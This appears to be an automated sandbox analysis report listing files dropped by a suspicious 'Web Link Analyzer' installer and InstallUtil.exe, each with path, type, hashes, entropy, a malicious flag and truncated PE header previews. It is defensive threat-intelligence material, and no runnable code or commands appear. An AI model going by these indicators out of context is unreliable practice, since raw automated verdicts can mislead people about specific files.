                                                                                                                                                                                                                                SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\is-NP3DM.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):105784
                                                                                                                                                                                                                                Entropy (8bit):6.258144336244945
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                                                                                                                                MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                                                                                                                                SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                                                                                                                                SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                                                                                                                                SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\is-QD6MG.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):125637
                                                                                                                                                                                                                                Entropy (8bit):6.2640431186303145
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                                                                                MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                                                                                SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                                                                                SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                                                                                SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\libbz2-1.dll (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):105784
                                                                                                                                                                                                                                Entropy (8bit):6.258144336244945
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                                                                                                                                MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                                                                                                                                SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                                                                                                                                SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                                                                                                                                SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):125637
                                                                                                                                                                                                                                Entropy (8bit):6.2640431186303145
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                                                                                MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                                                                                SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                                                                                SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                                                                                SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\libogg-0.dll (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40974
                                                                                                                                                                                                                                Entropy (8bit):6.485702128133584
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                                                                                                                                MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                                                                                                                                SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                                                                                                                                SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                                                                                                                                SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\libvorbis-0.dll (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):176200
                                                                                                                                                                                                                                Entropy (8bit):6.647007817777345
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                                                                                                                                MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                                                                                                                                SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                                                                                                                                SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                                                                                                                                SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\libwinpthread-1.dll (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):68552
                                                                                                                                                                                                                                Entropy (8bit):6.1042544770100395
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                                                                                                                                MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                                                                                                                                SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                                                                                                                                SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                                                                                                                                SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\unins000.dat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:InnoSetup Log Web Link Analyzer, version 0x30, 4676 bytes, 562258\user, "C:\Users\user\AppData\Local\Web Link Analyzer"
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4676
                                                                                                                                                                                                                                Entropy (8bit):4.7113648908742
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:PLlipEWgRLprPL9v+eOIhfy4cVSQs0Lnh4Qvn:xOEWghprkHIhjcVSQ1nh1
                                                                                                                                                                                                                                MD5:E9B4D652DEF9B67F0101A22054EC4FA5
                                                                                                                                                                                                                                SHA1:320F8F579335F2950F3C7C85ADDD91159869EAD6
                                                                                                                                                                                                                                SHA-256:E2F972D4933DE4E90F21AF91DD1760436A968134678B8C0970735563D0762C4E
                                                                                                                                                                                                                                SHA-512:C72D3358BF418B8CC36372C4D092D10FC8630F94D439E3B1FA81F0C6EB11FD55C6787B455A65B410D9B58FAFD55ADCDA4A55479FE561855A890702BBAE4CAEBB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Inno Setup Uninstall Log (b)....................................Web Link Analyzer...............................................................................................................Web Link Analyzer...............................................................................................................0.......D...%.................................................................................................................@_..........v^......N....562258.user.C:\Users\user\AppData\Local\Web Link Analyzer.............".t.. .....5......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.d

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\unins000.exe (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):717985
                                                                                                                                                                                                                                Entropy (8bit):6.514875678107732
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF2:SPcYn5c/rPx37/zHBA6pFptZ1CEQqMRT
                                                                                                                                                                                                                                MD5:58BD10781634AA46C63D56CC1AEEC3FE
                                                                                                                                                                                                                                SHA1:A9A80E109952055C3BB2C3594955F427953801D7
                                                                                                                                                                                                                                SHA-256:965A67628F712D1AFC56DA3C46B2277EC4DB797CC14613085E718A2FEC6C0FA9
                                                                                                                                                                                                                                SHA-512:C3D1C16EBFA9B30A661D7BC34E165F31D6FA2CBF394F33C5FAD95B1DBEC6AE71B1B9053D8268D393AB79D4E78A6FD318B806DA06B19EA2C0B443E4C283405E24
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):2075202
                                                                                                                                                                                                                                Entropy (8bit):7.195175286859034
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:tQrflO1c7ZHq97qoPkIb/xBxlKemLLZOyt07l97T6/K5Pu:tQNMclHq9WSrxBxlKemXC7D7GYu
                                                                                                                                                                                                                                MD5:B0E9D3290621648878CA0D486C60F951
                                                                                                                                                                                                                                SHA1:7979A79D81472ACF1A0C14F54AE4E39F94DFB619
                                                                                                                                                                                                                                SHA-256:BCA8B1774E21704B6DF8771D09C76CD3E18CC704D0BBD30829DA3D230808AF4A
                                                                                                                                                                                                                                SHA-512:C68E5110C0BF159EF10AF8CEF92CD4DC122C9C5183D49973D62DB0D59A8E74FBAFE9342593DBAC52EC2CBBA08B3B0ABDE7131602B0C03D38832601E2EB1CE436
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.i^..........'................. .............@.....................................................................................h............................................................................................................text............................... ..`.rdata...1.......@..................@..@.data....T... ...0... ..............@....rsrc.... ....... ...P..............@..@.short2..@......B:...p..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\XcjiyfDAp1xg32d0IyIg2zMk.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\XexwpboKjyWVbo8FFgPmChDN.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Xm54wLBRTMA3iYcjiLbASkwx.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Ydv77irsMwFsUh797bOnhxVa.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\ZNUkdRLikcOE0I8txHta42nK.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Za9YgbYvsobCQHROGG56LpJy.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
